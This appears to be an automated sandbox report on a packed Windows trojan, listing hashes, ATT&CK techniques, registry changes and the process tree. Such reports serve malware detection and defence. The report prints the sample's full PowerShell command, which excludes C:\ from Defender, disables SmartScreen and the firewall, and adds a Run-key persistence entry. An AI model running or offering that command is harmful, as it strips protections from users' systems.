a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99

General

Target

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Size

3.3MB
MD5

54da56b5f62fedb130a09c3bdc7c8e08
SHA1

1c5f44b45d798534f3d047d8f2596439ba02140c
SHA256

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99
SHA512

c76c39305b9f216a114b255c3388c40e0981cd2a6a41ff7aab10d3ce346349910a200ad3e16cf570909752d64f726e3b04d2ba07209a207e6311cc3d78d2fefc

Score

10^/10

evasion persistence themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

UpSys.exeUpSys.exeUpSys.exe

pid process

1648 UpSys.exe
532 UpSys.exe
1316 UpSys.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

pid	process
1648	UpSys.exe
532	UpSys.exe
1316	UpSys.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Drops startup file 1 IoCs

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Loads dropped DLL 3 IoCs

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exepowershell.exe

pid process

1724 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1212 powershell.exe
880

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1724-54-0x000000013F8B0000-0x00000001401B8000-memory.dmp	themida
behavioral1/memory/1724-55-0x000000013F8B0000-0x00000001401B8000-memory.dmp	themida
\ProgramData\MicrosoftNetwork\System.exe	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"	powershell.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

pid process

1724 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220215073448.cab makecab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220215073448.cab	makecab.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

UpSys.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	UpSys.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90a214833e22d801	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exepowershell.exeUpSys.exeUpSys.exepowershell.exe

pid	process
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1212	powershell.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1648	UpSys.exe
1648	UpSys.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
532	UpSys.exe
532	UpSys.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1144	powershell.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeUpSys.exeUpSys.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	1648	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	1648	UpSys.exe
Token: SeIncreaseQuotaPrivilege	1648	UpSys.exe
Token: 0	1648	UpSys.exe
Token: SeDebugPrivilege	532	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	532	UpSys.exe
Token: SeIncreaseQuotaPrivilege	532	UpSys.exe
Token: SeDebugPrivilege	1144	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exepowershell.exeUpSys.exe

description	pid	process	target process
PID 1724 wrote to memory of 1212	1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe	powershell.exe
PID 1724 wrote to memory of 1212	1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe	powershell.exe
PID 1724 wrote to memory of 1212	1724	a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe	powershell.exe
PID 1212 wrote to memory of 1648	1212	powershell.exe	UpSys.exe
PID 1212 wrote to memory of 1648	1212	powershell.exe	UpSys.exe
PID 1212 wrote to memory of 1648	1212	powershell.exe	UpSys.exe
PID 1212 wrote to memory of 1636	1212	powershell.exe	netsh.exe
PID 1212 wrote to memory of 1636	1212	powershell.exe	netsh.exe
PID 1212 wrote to memory of 1636	1212	powershell.exe	netsh.exe
PID 1316 wrote to memory of 1144	1316	UpSys.exe	powershell.exe
PID 1316 wrote to memory of 1144	1316	UpSys.exe	powershell.exe
PID 1316 wrote to memory of 1144	1316	UpSys.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
"C:\Users\Admin\AppData\Local\Temp\a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe"
1⤵
- Checks BIOS information in registry
- Drops startup file
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
2⤵
- Modifies security service
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:532

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
6⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
3⤵
PID:1636

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220215073448.log C:\Windows\Logs\CBS\CbsPersist_20220215073448.cab
1⤵
- Drops file in Windows directory
PID:900

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Virtualization/Sandbox Evasion

1

T1497

Install Root Certificate

1

T1130

Credential Access

Discovery

Query Registry

2

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
\ProgramData\MicrosoftNetwork\System.exe
MD5
54da56b5f62fedb130a09c3bdc7c8e08

SHA1
1c5f44b45d798534f3d047d8f2596439ba02140c

SHA256
a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99

SHA512
c76c39305b9f216a114b255c3388c40e0981cd2a6a41ff7aab10d3ce346349910a200ad3e16cf570909752d64f726e3b04d2ba07209a207e6311cc3d78d2fefc

Download Submit
\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
memory/1144-82-0x000000000247B000-0x000000000249A000-memory.dmp

Filesize
124KB

Download
memory/1144-81-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/1144-80-0x0000000002472000-0x0000000002474000-memory.dmp

Filesize
8KB

Download
memory/1144-78-0x000007FEF59BE000-0x000007FEF59BF000-memory.dmp

Filesize
4KB

Download
memory/1144-79-0x0000000002470000-0x0000000002472000-memory.dmp

Filesize
8KB

Download
memory/1144-77-0x000007FEF31D0000-0x000007FEF3D2D000-memory.dmp

Filesize
11.4MB

Download
memory/1212-63-0x00000000027C2000-0x00000000027C4000-memory.dmp

Filesize
8KB

Download
memory/1212-67-0x00000000027CB000-0x00000000027EA000-memory.dmp

Filesize
124KB

Download
memory/1212-64-0x00000000027C4000-0x00000000027C7000-memory.dmp

Filesize
12KB

Download
memory/1212-62-0x00000000027C0000-0x00000000027C2000-memory.dmp

Filesize
8KB

Download
memory/1212-61-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp

Filesize
4KB

Download
memory/1212-59-0x000007FEF36B0000-0x000007FEF420D000-memory.dmp

Filesize
11.4MB

Download
memory/1724-55-0x000000013F8B0000-0x00000001401B8000-memory.dmp

Filesize
9.0MB

Download
memory/1724-54-0x000000013F8B0000-0x00000001401B8000-memory.dmp

Filesize
9.0MB

Download
memory/1724-56-0x0000000077C20000-0x0000000077C22000-memory.dmp

Filesize
8KB

Download
memory/1724-57-0x000007FEFC451000-0x000007FEFC453000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads